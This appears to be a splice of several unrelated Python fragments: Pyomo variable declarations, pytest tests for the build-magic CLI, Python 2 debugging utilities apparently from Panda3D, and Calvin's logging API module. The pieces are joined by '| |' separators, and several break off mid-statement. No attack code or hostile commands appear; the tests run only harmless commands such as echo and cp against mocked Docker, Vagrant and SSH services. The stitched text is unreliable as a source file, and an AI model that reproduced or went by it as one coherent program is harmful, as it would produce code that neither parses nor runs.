m.x1207 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1208 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1209 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1210 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1211 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1212 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1213 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1214 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1215 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1216 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1217 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1218 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1219 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1220 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1221 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1222 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1223 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1224 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1225 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1226 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1227 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1228 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1229 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1230 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1231 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1232 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1233 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1234 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1235 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1236 = Var(within=Reals,bounds=(0,None),initialize=0)
m.x1237 | |
assert 'Setup failed: A build-magic container is already running.' in res.output
def test_cli_docker_not_found(cli, mocker):
"""Test the case where Docker isn't running or isn't installed."""
mocker.patch('docker.from_env', side_effect=DockerDaemonError)
res = cli.invoke(build_magic, ['-r', 'docker', '-e', 'alpine:latest', 'echo', '"hello world"'])
assert 'Setup failed: Cannot connect to Docker daemon. Is Docker installed and running?' in res.output
def test_cli_docker_hostwd_not_found(cli, mocker):
"""Test the case where the hostwd doesn't exist."""
mocker.patch('pathlib.Path.exists', return_value=False)
res = cli.invoke(build_magic, ['-p', 'hostwd', 'fake', '-r', 'docker', '-e', 'alpine:latest', 'echo', 'hello'])
assert res.output == 'The host working directory was not found.\n'
assert res.exit_code == ExitCode.INPUT_ERROR.value
def test_cli_vagrant_not_found(cli, mocker):
"""Test the case where Vagrant isn't found or installed."""
mocker.patch('vagrant.which', return_value=None)
mocker.patch('pathlib.Path.exists', return_value=True)
res = cli.invoke(build_magic, ['-r', 'vagrant', '-e', 'files/Vagrantfile', 'echo', '"hello world"'])
assert 'The Vagrant executable cannot be found. Please check if it is in the system path.' in res.output
def test_cli_vagrant_hostwd_not_found(cli, mocker):
"""Test the case where the hostwd doesn't exist."""
mocker.patch('pathlib.Path.exists', return_value=False)
res = cli.invoke(build_magic, ['-r', 'vagrant', '-e', 'fake/Vagrantfile', 'echo', '"hello world"'])
assert res.output == 'The host working directory was not found.\n'
assert res.exit_code == ExitCode.INPUT_ERROR.value
def test_cli_vagrant_missing_environment(cli):
"""Test the case where the vagrant runner is called without the environment option."""
ref = """Environment must be a path to a Vagrant file if using the Vagrant runner.
"""
res = cli.invoke(build_magic, ['-r', 'vagrant', 'ls'])
assert res.exit_code == ExitCode.INPUT_ERROR
assert res.output == ref
def test_cli_empty_string_command(cli):
"""Test the case where the command provided is an empty string."""
ref = """There are no commands to execute.
"""
res = cli.invoke(build_magic, ['-c', 'execute', ''])
assert res.exit_code == ExitCode.INPUT_ERROR
assert res.output == ref
def test_cli_artifacts_but_empty_string_command(cli):
"""Test the case where artifacts are provided as arguments but with no command."""
res = cli.invoke(build_magic, ['file1.txt', 'file2.txt'])
assert res.exit_code == ExitCode.FAILED
def test_cli_options_no_command(cli):
"""Test the case where options are provided without a command."""
res = cli.invoke(build_magic, ['--verbose', '--plain'])
assert res.exit_code == ExitCode.NO_TESTS
def test_cli_verbose_output(cli):
"""Verify the --verbose option works correctly."""
ref = """[ INFO ] OUTPUT: hello world"""
res = cli.invoke(build_magic, ['--verbose', '--plain', 'echo hello world'])
assert res.exit_code == ExitCode.PASSED
assert ref in res.output
ref = """OUTPUT: hello world"""
res = cli.invoke(build_magic, ['--verbose', 'echo hello world'])
assert res.exit_code == ExitCode.PASSED
assert ref in res.output
ref = """OUTPUT: hello world"""
res = cli.invoke(build_magic, ['--verbose', '--fancy', 'echo hello world'])
assert res.exit_code == ExitCode.PASSED
assert ref in res.output
def test_cli_quiet(cli):
"""Verify the --quiet option supresses output correctly."""
res = cli.invoke(build_magic, ['--quiet', '--verbose', 'echo hello world'])
assert res.exit_code == ExitCode.PASSED
assert not res.output
res = cli.invoke(build_magic, ['--quiet', 'cp'])
assert res.exit_code == ExitCode.FAILED
assert not res.output
def test_cli_version(cli):
"""Verify the --version option works correctly."""
res = cli.invoke(build_magic, ['--version'])
assert res.exit_code == ExitCode.PASSED
assert res.output == f'{version}\n'
def test_keyboard_interrupt(cli, mocker):
"""Test the case where build-magic is interrupted with SIGINT."""
mocker.patch('build_magic.core.Engine.run', side_effect=KeyboardInterrupt)
ref = """
build-magic interrupted and exiting....
"""
res = cli.invoke(build_magic, ['sleep 5'])
assert res.exit_code == ExitCode.INTERRUPTED
assert res.output == ref
def test_cli_copy(cat, cli, tmp_file):
"""Verify the --copy option works correctly."""
res = cli.invoke(
build_magic,
['--copy', str(tmp_file), '--verbose', '-c', 'execute', f'{cat} hello.txt', 'hello.txt'],
)
assert 'OUTPUT: hello world' in res.output
assert res.exit_code == ExitCode.PASSED
def test_cli_working_directory(cat, cli, tmp_file):
"""Verify the --wd option works correctly."""
res = cli.invoke(build_magic, ['--wd', str(tmp_file), '--verbose', '-c', 'execute', f'{cat} hello.txt'])
assert 'OUTPUT: hello world' in res.output
assert res.exit_code == ExitCode.PASSED
def test_cli_copy_working_directory(cat, cli, current_file):
"""Verify the --copy and --wd options work together correctly."""
res = cli.invoke(
build_magic,
['--copy', '.', '--wd', str(current_file), '--verbose', '-c', 'build', f'{cat} hello.txt', 'hello.txt'],
)
assert 'OUTPUT: hello world' in res.output
assert res.exit_code == ExitCode.PASSED
def test_cli_continue_on_fail(cli):
"""Verify the --continue option works correctly."""
res = cli.invoke(build_magic, ['--verbose', '--continue', '-c', 'execute', 'cp', '-c', 'execute', 'echo hello'])
assert 'OUTPUT: hello' in res.output
assert res.exit_code == ExitCode.FAILED
def test_cli_stop_on_fail(cli, cp):
"""Verify the --stop option works correctly."""
res = cli.invoke(build_magic, ['--verbose', '--stop', '-c', 'execute', f'{cp}', '-c', 'execute', 'echo hello'])
if sys.platform == 'linux':
assert 'cp: missing file operand' in res.output
elif sys.platform == 'win32':
assert 'The syntax of the command is incorrect.' in res.output
else:
assert 'usage: cp' in res.output or 'cp: missing file operand' in res.output
assert 'OUTPUT: hello' not in res.output
assert res.exit_code == ExitCode.FAILED
def test_cli_parameters(cli):
"""Verify the --parameter option works correctly."""
res = cli.invoke(build_magic, ['-p', 'keytype', 'rsa', '--parameter', 'keypass', '1234', 'echo hello'])
assert res.exit_code == ExitCode.PASSED
assert '( 1/1 ) EXECUTE : echo hello ........................................ RUNNING' in res.output
assert 'Stage 1 finished with result DONE' in res.output
def test_cli_parameters_invalid_parameter(cli):
"""Test the case where an invalid parameter is provided."""
res = cli.invoke(build_magic, ['-p', 'dummy', '1234', 'echo hello'])
assert res.exit_code == ExitCode.INPUT_ERROR
assert res.output == 'Parameter dummy is not a valid parameter.\n'
def test_cli_parameters_invalid_parameter_value(cli):
"""Test the case where an invalid parameter value is provided."""
res = cli.invoke(build_magic, ['-p', 'keytype', 'dummy', 'echo hello'])
assert res.exit_code == ExitCode.INPUT_ERROR
assert "Validation failed: Value dummy is not one of " in res.output
def test_cli_config_template(cli):
"""Verify the --template option works correctly."""
filename = 'build-magic_template.yaml'
current = Path().cwd().resolve()
res = cli.invoke(build_magic, ['--template'])
assert current.joinpath(filename).exists()
os.remove(filename)
assert res.exit_code == ExitCode.PASSED
def test_cli_template_exists(cli):
"""Test the case where a template config file cannot be generated because one already exists."""
filename = 'build-magic_template.yaml'
current = Path.cwd().resolve()
Path.touch(current.joinpath(filename))
res = cli.invoke(build_magic, ['--template'])
os.remove(filename)
assert res.exit_code == ExitCode.INPUT_ERROR
assert res.output == 'Cannot generate the config template because it already exists!\n'
def test_cli_template_permission_error(cli, mocker):
"""Test the case where a template config file cannot be generated because the user does not have permission."""
mocker.patch('build_magic.core.generate_config_template', side_effect=PermissionError)
res = cli.invoke(build_magic, ['--template'])
assert res.exit_code == ExitCode.INPUT_ERROR
assert res.output == "Cannot generate the config template because build-magic doesn't have permission.\n"
def test_cli_config(cli, config_file, ls):
"""Verify the --config option works correctly."""
res = cli.invoke(build_magic, ['--config', str(config_file)])
assert res.exit_code == ExitCode.PASSED
assert 'Starting Stage 1: Test stage' in res.output
assert '( 1/2 ) EXECUTE : echo hello' in res.output
assert f'( 2/2 ) EXECUTE : {ls}' in res.output
assert 'Stage 1: Test stage - finished with result DONE' in res.output
assert 'build-magic finished in' in res.output
def test_cli_config_multi(cli, config_file, multi_config):
"""Verify assigning multiple config files works correctly."""
file1 = config_file
file2 = multi_config
res = cli.invoke(build_magic, ['--config', str(file1), '--config', str(file2)])
assert res.exit_code == ExitCode.PASSED
assert 'Starting Stage 1: Test stage' in res.output
assert 'Starting Stage 2: Stage A' in res.output
assert 'Starting Stage 3: Stage B' in res.output
assert 'Stage 1: Test stage - finished with result DONE' in res.output
assert 'Stage 2: Stage A - finished with result DONE' in res.output
assert 'Stage 3: Stage B - finished with result DONE' in res.output
def test_cli_config_parameters(cli, mocker, parameters_config):
"""Verify assigning parameters from a config file works correctly."""
mocker.patch('paramiko.ECDSAKey.from_private_key_file')
mocker.patch('build_magic.runner.Remote.connect', return_value=paramiko.SSHClient)
mocker.patch(
'paramiko.SSHClient.exec_command',
return_value=(
None,
MagicMock(readlines=lambda: 'hello', channel=MagicMock(recv_exit_status=lambda: 0)),
MagicMock(readlines=lambda: '')
)
)
mocker.patch('paramiko.SSHClient.close')
res = cli.invoke(build_magic, ['--config', str(parameters_config)])
assert res.exit_code == ExitCode.PASSED
assert "Starting Stage 1" in res.output
assert "( 1/1 ) EXECUTE : echo hello ........................................ RUNNING" in res.output
assert "Stage 1 finished with result DONE" in res.output
def test_cli_target(cli, targets_config):
"""Verify the --target option works correctly."""
# file = Path(resource_filename('tests', 'test_cli.py')).parent / 'files' / 'targets.yaml'
res = cli.invoke(build_magic, ['-C', str(targets_config), '--target', 'Stage D', '-t', 'Stage B'])
assert res.exit_code == ExitCode.PASSED
out = res.output
assert 'Stage D' in out
out = out.split('\n', maxsplit=8)[-1]
assert 'Stage B' in out
assert '( 1/1 ) EXECUTE : echo "B" .......................................... RUNNING' in res.output
assert "Stage 2: Stage B - finished with result DONE" in res.output
def test_cli_invalid_target(cli, targets_config):
"""Test the case where an invalid target name is provided."""
res = cli.invoke(build_magic, ['-C', str(targets_config), '-t', 'blarg'])
out = res.output
assert res.exit_code == ExitCode.INPUT_ERROR
assert out == "Target blarg not found among ['Stage A', 'Stage B', 'Stage C', 'Stage D'].\n"
def test_cli_yaml_parsing_error(cli, config_file, mocker):
"""Test the case where there's an error when parsing a config file."""
yaml_load = mocker.patch('yaml.safe_load', side_effect=ComposerError('YAML error'))
res = cli.invoke(build_magic, ['-C', str(config_file)])
out = res.output
assert res.exit_code == ExitCode.INPUT_ERROR
assert out == 'YAML error\n'
assert yaml_load.call_count == 1
def test_cli_default_config_all_stages(cli, default_config):
"""Verify the "all" argument works with a default config file."""
res = cli.invoke(build_magic, ['all'])
out = res.output
assert res.exit_code == ExitCode.PASSED
assert 'Starting Stage 1: build' in out
assert 'Starting Stage 2: deploy' in out
assert 'Starting Stage 3: release' in out
def test_cli_default_config_single_stage(cli, default_config):
"""Verify running a | |
+ '%0' + '%s' % digits + 'i:%s \t%s'
first = True
s = ''
snip = '<SNIP>'
for i in xrange(len(items)):
if not first:
s += '\n'
first = False
objStr = fastRepr(items[i])
if len(objStr) > maxLen:
objStr = '%s%s' % (objStr[:(maxLen-len(snip))], snip)
s += format % (i, itype(items[i]), objStr)
return s
def getNumberedTypedSortedString(items, maxLen=5000, numPrefix=''):
"""get a string that has each item of the list on its own line,
the items are stringwise-sorted, and each item is numbered on
the left from zero"""
digits = 0
n = len(items)
while n > 0:
digits += 1
n //= 10
digits = digits
format = numPrefix + '%0' + '%s' % digits + 'i:%s \t%s'
snip = '<SNIP>'
strs = []
for item in items:
objStr = fastRepr(item)
if len(objStr) > maxLen:
objStr = '%s%s' % (objStr[:(maxLen-len(snip))], snip)
strs.append(objStr)
first = True
s = ''
strs.sort()
for i in xrange(len(strs)):
if not first:
s += '\n'
first = False
objStr = strs[i]
s += format % (i, itype(items[i]), strs[i])
return s
def getNumberedTypedSortedStringWithReferrersGen(items, maxLen=10000, numPrefix=''):
"""get a string that has each item of the list on its own line,
the items are stringwise-sorted, the object's referrers are shown,
and each item is numbered on the left from zero"""
digits = 0
n = len(items)
while n > 0:
digits += 1
n //= 10
digits = digits
format = numPrefix + '%0' + '%s' % digits + 'i:%s @ %s \t%s'
snip = '<SNIP>'
strs = []
for item in items:
strs.append(fastRepr(item))
strs.sort()
for i in xrange(len(strs)):
item = items[i]
objStr = strs[i]
objStr += ', \tREFERRERS=['
referrers = gc.get_referrers(item)
for ref in referrers:
objStr += '%s@%s, ' % (itype(ref), id(ref))
objStr += ']'
if len(objStr) > maxLen:
objStr = '%s%s' % (objStr[:(maxLen-len(snip))], snip)
yield format % (i, itype(items[i]), id(items[i]), objStr)
def getNumberedTypedSortedStringWithReferrers(items, maxLen=10000, numPrefix=''):
"""get a string that has each item of the list on its own line,
the items are stringwise-sorted, the object's referrers are shown,
and each item is numbered on the left from zero"""
s = ''
for line in getNumberedTypedSortedStringWithReferrersGen(items, maxLen, numPrefix):
s += '%s\n' % line
return s
def printNumberedTyped(items, maxLen=5000):
"""print out each item of the list on its own line,
with each item numbered on the left from zero"""
digits = 0
n = len(items)
while n > 0:
digits += 1
n //= 10
digits = digits
format = '%0' + '%s' % digits + 'i:%s \t%s'
for i in xrange(len(items)):
objStr = fastRepr(items[i])
if len(objStr) > maxLen:
snip = '<SNIP>'
objStr = '%s%s' % (objStr[:(maxLen-len(snip))], snip)
print format % (i, itype(items[i]), objStr)
def printNumberedTypesGen(items, maxLen=5000):
digits = 0
n = len(items)
while n > 0:
digits += 1
n //= 10
digits = digits
format = '%0' + '%s' % digits + 'i:%s'
for i in xrange(len(items)):
print format % (i, itype(items[i]))
yield None
def printNumberedTypes(items, maxLen=5000):
"""print out the type of each item of the list on its own line,
with each item numbered on the left from zero"""
for result in printNumberedTypesGen(items, maxLen):
yield result
class DelayedCall:
""" calls a func after a specified delay """
def __init__(self, func, name=None, delay=None):
if name is None:
name = 'anonymous'
if delay is None:
delay = .01
self._func = func
self._taskName = 'DelayedCallback-%s' % name
self._delay = delay
self._finished = False
self._addDoLater()
def destroy(self):
self._finished = True
self._removeDoLater()
def finish(self):
if not self._finished:
self._doCallback()
self.destroy()
def _addDoLater(self):
taskMgr.doMethodLater(self._delay, self._doCallback, self._taskName)
def _removeDoLater(self):
taskMgr.remove(self._taskName)
def _doCallback(self, task):
self._finished = True
func = self._func
del self._func
func()
class FrameDelayedCall:
""" calls a func after N frames """
def __init__(self, name, callback, frames=None, cancelFunc=None):
# checkFunc is optional; called every frame, if returns True, FrameDelay is cancelled
# and callback is not called
if frames is None:
frames = 1
self._name = name
self._frames = frames
self._callback = callback
self._cancelFunc = cancelFunc
self._taskName = uniqueName('%s-%s' % (self.__class__.__name__, self._name))
self._finished = False
self._startTask()
def destroy(self):
self._finished = True
self._stopTask()
def finish(self):
if not self._finished:
self._finished = True
self._callback()
self.destroy()
def _startTask(self):
taskMgr.add(self._frameTask, self._taskName)
self._counter = 0
def _stopTask(self):
taskMgr.remove(self._taskName)
def _frameTask(self, task):
if self._cancelFunc and self._cancelFunc():
self.destroy()
return task.done
self._counter += 1
if self._counter >= self._frames:
self.finish()
return task.done
return task.cont
class DelayedFunctor:
""" Waits for this object to be called, then calls supplied functor after a delay.
Effectively inserts a time delay between the caller and the functor. """
def __init__(self, functor, name=None, delay=None):
self._functor = functor
self._name = name
# FunctionInterval requires __name__
self.__name__ = self._name
self._delay = delay
def _callFunctor(self):
cb = Functor(self._functor, *self._args, **self._kwArgs)
del self._functor
del self._name
del self._delay
del self._args
del self._kwArgs
del self._delayedCall
del self.__name__
cb()
def __call__(self, *args, **kwArgs):
self._args = args
self._kwArgs = kwArgs
self._delayedCall = DelayedCall(self._callFunctor, self._name, self._delay)
class SubframeCall:
"""Calls a callback at a specific time during the frame using the
task system"""
def __init__(self, functor, taskPriority, name=None):
self._functor = functor
self._name = name
self._taskName = uniqueName('SubframeCall-%s' % self._name)
taskMgr.add(self._doCallback,
self._taskName,
priority=taskPriority)
def _doCallback(self, task):
functor = self._functor
del self._functor
functor()
del self._name
self._taskName = None
return task.done
def cleanup(self):
if (self._taskName):
taskMgr.remove(self._taskName)
self._taskName = None
class ArgumentEater:
def __init__(self, numToEat, func):
self._numToEat = numToEat
self._func = func
def destroy(self):
del self._func
def __call__(self, *args, **kwArgs):
self._func(*args[self._numToEat:], **kwArgs)
class ClassTree:
def __init__(self, instanceOrClass):
if type(instanceOrClass) in (types.ClassType, types.TypeType):
cls = instanceOrClass
else:
cls = instanceOrClass.__class__
self._cls = cls
self._bases = []
for base in self._cls.__bases__:
if base not in (types.ObjectType, types.TypeType):
self._bases.append(ClassTree(base))
def getAllClasses(self):
# returns set of this class and all base classes
classes = set()
classes.add(self._cls)
for base in self._bases:
classes.update(base.getAllClasses())
return classes
def _getStr(self, indent=None, clsLeftAtIndent=None):
# indent is how far to the right to indent (i.e. how many levels
# deep in the hierarchy from the most-derived)
#
# clsLeftAtIndent is an array of # of classes left to be
# printed at each level of the hierarchy; most-derived is
# at index 0
if indent is None:
indent = 0
clsLeftAtIndent = [1]
s = ''
if (indent > 1):
for i in xrange(1, indent):
# if we have not printed all base classes at
# this indent level, keep printing the vertical
# column
if clsLeftAtIndent[i] > 0:
s += ' |'
else:
s += ' '
if (indent > 0):
s += ' +'
s += self._cls.__name__
clsLeftAtIndent[indent] -= 1
"""
### show the module to the right of the class name
moduleIndent = 48
if len(s) >= moduleIndent:
moduleIndent = (len(s) % 4) + 4
padding = moduleIndent - len(s)
s += padding * ' '
s += self._cls.__module__
###
"""
if len(self._bases):
newList = list(clsLeftAtIndent)
newList.append(len(self._bases))
bases = self._bases
# print classes with fewer bases first
bases.sort(lambda x,y: len(x._bases)-len(y._bases))
for base in bases:
s += '\n%s' % base._getStr(indent+1, newList)
return s
def __repr__(self):
return self._getStr()
class PStatScope:
collectors = {}
def __init__(self, level = None):
self.levels = []
if level:
self.levels.append(level)
def copy(self, push = None):
c = PStatScope()
c.levels = self.levels[:]
if push:
c.push(push)
return c
def __repr__(self):
return 'PStatScope - \'%s\'' % (self,)
def __str__(self):
return ':'.join(self.levels)
def push(self, level):
self.levels.append(level.replace('_',''))
def pop(self):
return self.levels.pop()
def start(self, push = None):
if push:
self.push(push)
pass
self.getCollector().start()
def stop(self, pop = False):
self.getCollector().stop()
if pop:
self.pop()
def getCollector(self):
label = str(self)
if label not in self.collectors:
from panda3d.core import PStatCollector
self.collectors[label] = PStatCollector(label)
pass
# print ' ',self.collectors[label]
return self.collectors[label]
def pstatcollect(scope, level = None):
def decorator(f):
return f
try:
if not (__dev__ or config.GetBool('force-pstatcollect', 0)) or \
not scope:
return decorator
def decorator(f):
def wrap(*args, **kw):
scope.start(push = (level or f.__name__))
val = f(*args, **kw)
scope.stop(pop = True)
return val
return wrap
pass
except:
pass
return decorator
__report_indent = 0
def report(types = [], prefix = '', xform = None, notifyFunc = None, dConfigParam = []):
"""
This is a decorator generating function. Use is similar to
a | |
<filename>calvin/runtime/north/control_apis/logging_api.py
# -*- coding: utf-8 -*-
# Copyright (c) 2018 Ericsson AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import time
from calvin.requests import calvinresponse
from calvin.utilities import calvinuuid
from routes import register, handler
from authentication import authentication_decorator
LOG_ACTOR_FIRING = 0
LOG_ACTION_RESULT = 1
LOG_ACTOR_NEW = 2
LOG_ACTOR_DESTROY = 3
LOG_ACTOR_MIGRATE = 4
LOG_APPLICATION_NEW = 5
LOG_APPLICATION_DESTROY = 6
LOG_LINK_CONNECTED = 7
LOG_LINK_DISCONNECTED = 8
LOG_ACTOR_REPLICATE = 9
LOG_ACTOR_DEREPLICATE = 10
LOG_LOG_MESSAGE = 11
class Logger(object):
""" Log object
"""
def __init__(self, actors, events):
self.handle = None
self.connection = None
self.actors = actors
self.events = events
def set_connection(self, handle, connection):
self.handle = handle
self.connection = connection
#
# Override a number of stub methods with real implementations
#
@register
def log_actor_firing(self, actor_id, action_method, tokens_produced, tokens_consumed, production):
""" Trace actor firing
"""
disconnected = []
for user_id, logger in self.loggers.iteritems():
if not logger.events or LOG_ACTOR_FIRING in logger.events:
if not logger.actors or actor_id in logger.actors:
data = {}
data['timestamp'] = time.time()
data['node_id'] = self.node.id
data['type'] = 'actor_fire'
data['actor_id'] = actor_id
data['action_method'] = action_method
data['produced'] = tokens_produced
data['consumed'] = tokens_consumed
if LOG_ACTION_RESULT in logger.events:
data['action_result'] = production
if logger.connection is not None:
if not logger.connection.connection_lost:
logger.connection.send("data: %s\n\n" % json.dumps(data))
else:
disconnected.append(user_id)
elif self.tunnel_client is not None and logger.handle is not None:
msg = {"cmd": "logevent", "msgid": logger.handle, "header": None, "data": "data: %s\n\n" % json.dumps(data)}
self.tunnel_client.send(msg)
for user_id in disconnected:
del self.loggers[user_id]
@register
def log_actor_new(self, actor_id, actor_name, actor_type, is_shadow):
""" Trace actor new
"""
disconnected = []
for user_id, logger in self.loggers.iteritems():
if not logger.events or LOG_ACTOR_NEW in logger.events:
if not logger.actors or actor_id in logger.actors:
data = {}
data['timestamp'] = time.time()
data['node_id'] = self.node.id
data['type'] = 'actor_new'
data['actor_id'] = actor_id
data['actor_name'] = actor_name
data['actor_type'] = actor_type
data['is_shadow'] = is_shadow
if logger.connection is not None:
if not logger.connection.connection_lost:
logger.connection.send("data: %s\n\n" % json.dumps(data))
else:
disconnected.append(user_id)
elif self.tunnel_client is not None and logger.handle is not None:
msg = {"cmd": "logevent", "msgid": logger.handle, "header": None, "data": "data: %s\n\n" % json.dumps(data)}
self.tunnel_client.send(msg)
for user_id in disconnected:
del self.loggers[user_id]
@register
def log_actor_destroy(self, actor_id):
""" Trace actor destroy
"""
disconnected = []
for user_id, logger in self.loggers.iteritems():
if not logger.events or LOG_ACTOR_DESTROY in logger.events:
if not logger.actors or actor_id in logger.actors:
data = {}
data['timestamp'] = time.time()
data['node_id'] = self.node.id
data['type'] = 'actor_destroy'
data['actor_id'] = actor_id
if logger.connection is not None:
if not logger.connection.connection_lost:
logger.connection.send("data: %s\n\n" % json.dumps(data))
else:
disconnected.append(user_id)
elif self.tunnel_client is not None and logger.handle is not None:
msg = {"cmd": "logevent", "msgid": logger.handle, "header": None, "data": "data: %s\n\n" % json.dumps(data)}
self.tunnel_client.send(msg)
for user_id in disconnected:
del self.loggers[user_id]
@register
def log_actor_migrate(self, actor_id, dest_node_id):
""" Trace actor migrate
"""
disconnected = []
for user_id, logger in self.loggers.iteritems():
if not logger.events or LOG_ACTOR_MIGRATE in logger.events:
if not logger.actors or actor_id in logger.actors:
data = {}
data['timestamp'] = time.time()
data['node_id'] = self.node.id
data['type'] = 'actor_migrate'
data['actor_id'] = actor_id
data['dest_node_id'] = dest_node_id
if logger.connection is not None:
if not logger.connection.connection_lost:
logger.connection.send("data: %s\n\n" % json.dumps(data))
else:
disconnected.append(user_id)
elif self.tunnel_client is not None and logger.handle is not None:
msg = {"cmd": "logevent", "msgid": logger.handle, "header": None, "data": "data: %s\n\n" % json.dumps(data)}
self.tunnel_client.send(msg)
for user_id in disconnected:
del self.loggers[user_id]
@register
def log_actor_replicate(self, actor_id, replica_actor_id, replication_id, dest_node_id):
""" Trace actor replication
"""
disconnected = []
for user_id, logger in self.loggers.iteritems():
if not logger.events or LOG_ACTOR_REPLICATE in logger.events:
if not logger.actors or actor_id in logger.actors:
data = {}
data['timestamp'] = time.time()
data['node_id'] = self.node.id
data['type'] = 'actor_replicate'
data['actor_id'] = actor_id
data['dest_node_id'] = dest_node_id
data['replication_id'] = replication_id
data['replica_actor_id'] = replica_actor_id
if logger.connection is not None:
if not logger.connection.connection_lost:
logger.connection.send("data: %s\n\n" % json.dumps(data))
else:
disconnected.append(user_id)
elif self.tunnel_client is not None and logger.handle is not None:
msg = {"cmd": "logevent", "msgid": logger.handle, "header": None, "data": "data: %s\n\n" % json.dumps(data)}
self.tunnel_client.send(msg)
for user_id in disconnected:
del self.loggers[user_id]
@register
def log_actor_dereplicate(self, actor_id, replica_actor_id, replication_id):
""" Trace actor dereplication
"""
disconnected = []
for user_id, logger in self.loggers.iteritems():
if not logger.events or LOG_ACTOR_DEREPLICATE in logger.events:
if not logger.actors or actor_id in logger.actors:
data = {}
data['timestamp'] = time.time()
data['node_id'] = self.node.id
data['type'] = 'actor_dereplicate'
data['actor_id'] = actor_id
data['replication_id'] = replication_id
data['replica_actor_id'] = replica_actor_id
if logger.connection is not None:
if not logger.connection.connection_lost:
logger.connection.send("data: %s\n\n" % json.dumps(data))
else:
disconnected.append(user_id)
elif self.tunnel_client is not None and logger.handle is not None:
msg = {"cmd": "logevent", "msgid": logger.handle, "header": None, "data": "data: %s\n\n" % json.dumps(data)}
self.tunnel_client.send(msg)
for user_id in disconnected:
del self.loggers[user_id]
@register
def log_application_new(self, application_id, application_name):
""" Trace application new
"""
disconnected = []
for user_id, logger in self.loggers.iteritems():
if not logger.events or LOG_APPLICATION_NEW in logger.events:
data = {}
data['timestamp'] = time.time()
data['node_id'] = self.node.id
data['type'] = 'application_new'
data['application_id'] = application_id
data['application_name'] = application_name
if logger.connection is not None:
if not logger.connection.connection_lost:
logger.connection.send("data: %s\n\n" % json.dumps(data))
else:
disconnected.append(user_id)
elif self.tunnel_client is not None and logger.handle is not None:
msg = {"cmd": "logevent", "msgid": logger.handle, "header": None, "data": "data: %s\n\n" % json.dumps(data)}
self.tunnel_client.send(msg)
for user_id in disconnected:
del self.loggers[user_id]
@register
def log_application_destroy(self, application_id):
""" Trace application destroy
"""
disconnected = []
for user_id, logger in self.loggers.iteritems():
if not logger.events or LOG_APPLICATION_DESTROY in logger.events:
data = {}
data['timestamp'] = time.time()
data['node_id'] = self.node.id
data['type'] = 'application_destroy'
data['application_id'] = application_id
if logger.connection is not None:
if not logger.connection.connection_lost:
logger.connection.send("data: %s\n\n" % json.dumps(data))
else:
disconnected.append(user_id)
elif self.tunnel_client is not None and logger.handle is not None:
msg = {"cmd": "logevent", "msgid": logger.handle, "header": None, "data": "data: %s\n\n" % json.dumps(data)}
self.tunnel_client.send(msg)
for user_id in disconnected:
del self.loggers[user_id]
@register
def log_link_connected(self, peer_id, uri):
""" Trace node connect
"""
disconnected = []
for user_id, logger in self.loggers.iteritems():
if not logger.events or LOG_LINK_CONNECTED in logger.events:
data = {}
data['timestamp'] = time.time()
data['node_id'] = self.node.id
data['type'] = 'link_connected'
data['peer_id'] = peer_id
data['uri'] = uri
if logger.connection is not None:
if not logger.connection.connection_lost:
logger.connection.send("data: %s\n\n" % json.dumps(data))
else:
disconnected.append(user_id)
elif self.tunnel_client is not None and logger.handle is not None:
msg = {"cmd": "logevent", "msgid": logger.handle, "header": None, "data": "data: %s\n\n" % json.dumps(data)}
self.tunnel_client.send(msg)
for user_id in disconnected:
del self.loggers[user_id]
@register
def log_link_disconnected(self, peer_id):
""" Trace node connect
"""
disconnected = []
for user_id, logger in self.loggers.iteritems():
if not logger.events or LOG_LINK_DISCONNECTED in logger.events:
data = {}
data['timestamp'] = time.time()
data['node_id'] = self.node.id
data['type'] = 'link_disconnected'
data['peer_id'] = peer_id
if logger.connection is not None:
if not logger.connection.connection_lost:
logger.connection.send("data: %s\n\n" % json.dumps(data))
else:
disconnected.append(user_id)
elif self.tunnel_client is not None and logger.handle is not None:
msg = {"cmd": "logevent", "msgid": logger.handle, "header": None, "data": "data: %s\n\n" % json.dumps(data)}
self.tunnel_client.send(msg)
for user_id in disconnected:
del self.loggers[user_id]
@register
def log_log_message(self, message):
""" Log message that is displayed at listener
"""
disconnected = []
for user_id, logger in self.loggers.iteritems():
if not logger.events or LOG_LOG_MESSAGE in logger.events:
data = {}
data['timestamp'] = time.time()
data['node_id'] = self.node.id
data['type'] = 'log_message'
data['msg'] = message
if logger.connection is not None:
if not logger.connection.connection_lost:
logger.connection.send("data: %s\n\n" % json.dumps(data))
else:
disconnected.append(user_id)
elif self.tunnel_client is not None and logger.handle is not None:
msg = {"cmd": "logevent", "msgid": logger.handle, "header": None, "data": "data: %s\n\n" % json.dumps(data)}
self.tunnel_client.send(msg)
for user_id in disconnected:
del self.loggers[user_id]
